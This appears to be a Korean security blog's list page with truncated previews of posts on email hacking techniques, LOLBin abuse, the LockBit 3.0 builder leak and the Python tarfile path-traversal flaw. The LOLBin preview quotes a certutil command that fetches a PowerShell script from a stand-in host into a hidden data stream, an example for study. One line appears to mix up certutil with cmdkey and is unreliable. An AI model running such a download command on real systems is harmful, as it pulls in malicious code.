보호되어 있는 글입니다.

1. 이메일을 전송한 클라이언트의 IP 주소를 확인할 수 있는 필드 : X-Originating-IP 2. 이메일을 이용한 해킹 기법 - 이메일 계정을 해킹하여 도용하는 EAC(email account compromise) - 이메일 계정 해킹 없이 발신자를 그럴듯하게 위장하는 스푸핑 - BEC(business email compromise): 피해자가 평소 신뢰하고 있던 이메일로부터 들어오는 사기 공격 3. 특정 개인의 이메일 계정을 해킹하는 기법? - 키 로깅 통해 사용자가 입력하는 id passwd 수집 - 피싱 메일 통해 타겟의 password 입력하도록 유도 - 메일 서버의 취약점 이용하여 사용자 인증 우회 4. Message ID 분석 - Message ID는 MUA(mail user agen..

1. LoL Bins를 악용한 공격 스크립트 분석 certutil.exe -urlcache -split -f https://example.com/mal.ps1 c:\temp:zip 1) urlcache 옵션은 인증기관 인증서 설치를 위해 사용한다. ▶ URL 캐시 항목을 표시 또는 삭제하는 역할 2) 다운로드 받은 스크립트 파일은 ADS영역에 저장 ▶https://lolbas-project.github.io/lolbas/Binaries/Certutil/ 3) 스크립트 파일은 c:\temp에 zip 형태로 저장. 4) certutil은 저장된 사용자 이름과 암호 또는 자격 증명을 만들어 나열하고 삭제하는 역할. ▶ Cmdkey.exe 2. LoL Bins들 나열.. 이들의 기능 설명 1) Cmdkey.ex..

보호되어 있는 글입니다.

랜섬웨어 그룹 록빗(LockBit), 일반 기업들이 겪는 내부자 위협을 랜섬웨어 그룹 또한 겪고 있는 것이 확인되었다. 록빗 내 개발자로 보이는 인물이 파일을 암호화하는 인크립터의 코드를 공개했다. 그것도 가장 최신버전인 LockBit 3.0이다. 해당 코드는 깃허브를 통해 확인할 수 있다. 인크립터 코드가 공개되었다는 것은 누구나 조금의 코딩 지식만 있으면 랜섬웨어를 만들 수 있다는 의미이다. 그냥 암호화 알고리즘이 아닌.. 현 시점에서 가장 앞서 있는 사이버 범죄 단체가 사용하는 최신 버전의 랜섬웨어 빌더가 나온 것이기 때문. 동시에 보안 전문가들은 LockBit 3.0을 분석하며, 해당 과정을 통해 인크립터를 기반으로 한 미래 랜섬웨어를 막는 방법을 개발할 수도 있는 것이다. 보안 업체에서는 당분간..

파이썬에서 15년 동안 패치되지 않은 오류가 발견되었다. 이 오류는 이미 전 세계 수십만 개의 프로젝트에 삽입되어 있는 상황. 문제의 취약점은 CVE-2007-4559라는 경로 조작 오류로, 조사된 바에 의하면 35만 개 이상의 오픈소스 리포지터리들에 이 취약점이 발견되었다고 한다. 최근의 SW 개발방식을 생각하면.. 오픈소스들을 포함한 애플리케이션들의 수를 세는게 불가능할 정도. ＃CVE-2007-4559: Python의 tarfile 모듈에 있는 extract 및 extractall 함수의 디렉터리 탐색 취약점. ＃tarfile 모듈: TAR 아카이브를 생성하는 과정에서 각 파일의 메타데이터를 검사하고 수정할 때 이용되는 각종 필터를 손쉽게 추가할 수 있게 해 줌. 취약점을 내포한 코드베이스가 SW ..

보호되어 있는 글입니다.

이전 게시글과의 구분용 게시글